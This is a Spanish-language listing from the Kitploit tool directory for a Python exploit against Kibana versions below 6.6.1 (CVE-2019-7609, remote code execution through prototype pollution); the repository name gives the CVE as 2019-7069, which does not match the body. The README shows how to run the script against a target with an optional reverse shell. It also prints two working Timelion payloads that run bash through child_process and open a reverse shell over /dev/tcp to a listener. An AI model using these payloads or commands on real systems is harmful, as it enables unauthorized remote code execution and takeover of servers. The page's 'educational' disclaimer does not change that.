Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-7069-POC — Exploit en Python para Kibana CVE-2019-7609 de ejecución remota de código mediante contaminación de prototipos (prototype pollution). Detecta automáticamente versiones vulnerables, verifica el fallo y opcionalmente abre una shell inversa. | Kitploit
Herramientas/GitHubGitHub/caelumisme/cve-2019-7069-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Exploit en Python para Kibana CVE-2019-7609 de ejecución remota de código mediante contaminación de prototipos (prototype pollution). Detecta automáticamente versiones vulnerables, verifica el fallo y opcionalmente abre una shell inversa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 9 mesesAún no revisado

Kibana < 6.6.1 Exploit de Ejecución Remota de Código (CVE-2019-7609)

Exploit Banner

🚨 Exploit de RCE Educativo 🚨

Autor: LandGrey (Readaptación a Python3 por [Tu Nombre])
Referencia: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Aviso:
Este script es solo para fines educativos y pruebas de penetración autorizadas. No lo uses en sistemas que no poseas o para los que no tengas permiso explícito. El autor y los colaboradores no son responsables por el mal uso o daño causado por esta herramienta.


🎯 ¿Qué es esto?

Este es un script de exploit en Python 3 para la vulnerabilidad de Ejecución Remota de Código en versiones de Kibana < 6.6.1. Aprovecha una falla de contaminación de prototipos para ejecutar comandos arbitrarios, incluyendo generar una shell inversa, en una instancia vulnerable de Kibana.

🕹️ Características

  • Detecta la versión de Kibana automáticamente
  • Verifica el estado de la vulnerabilidad
  • Opcionalmente desencadena una shell inversa a tu listener
  • Salida de terminal limpia e interactiva
  • Totalmente compatible con Python 3

📚 Referencias

  • Exploit-DB Entry 46651
  • Kibana Official Site
  • CVE-2019-7609

🚀 Uso

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601

Para desencadenar una shell inversa:

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

Ejemplo

root@kitploit:~
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ Requisitos

  • Python 3.x
  • librería requests
  • librería packaging

Instala las dependencias con:

root@kitploit:~
pip install requests packaging

💡 Explotación Manual mediante Timelion

También puedes explotar esta vulnerabilidad manualmente usando el visualizador Timelion de Kibana:

  1. Abre Kibana
  2. Pega uno de los siguientes payloads en el visualizador Timelion
  3. Haz clic en Ejecutar
  4. En el panel izquierdo, haz clic en Canvas
  5. ¡Tu shell inversa debería aparecer! :)

Payload por securityMB:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Payload por chybeta:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Reemplaza 192.168.1.100 y 4444 con tu propia IP y puerto de listener.


🧩 Cómo Funciona

  • Detecta la versión de Kibana mediante una petición HTTP
  • Verifica si el objetivo es vulnerable a CVE-2019-7609
  • Explota la contaminación de prototipos para ejecutar comandos arbitrarios
  • Opcionalmente genera una shell inversa hacia tu host y puerto especificados

🎨 Salida

El script proporciona una salida clara y paso a paso para la detección, verificación y explotación, haciendo que sea fácil de seguir y divertido de usar!


👾 Por Diversión y Aprendizaje

Este script es una excelente manera de aprender sobre contaminación de prototipos, ejecución remota de código y técnicas de pruebas de penetración. ¡Úsalo de manera responsable y siempre con permiso!


📝 Licencia

Este proyecto es solo para uso educativo. Sin garantía, sin compromisos. Hackea éticamente, mantén la curiosidad y ¡diviértete!

Descargar herramienta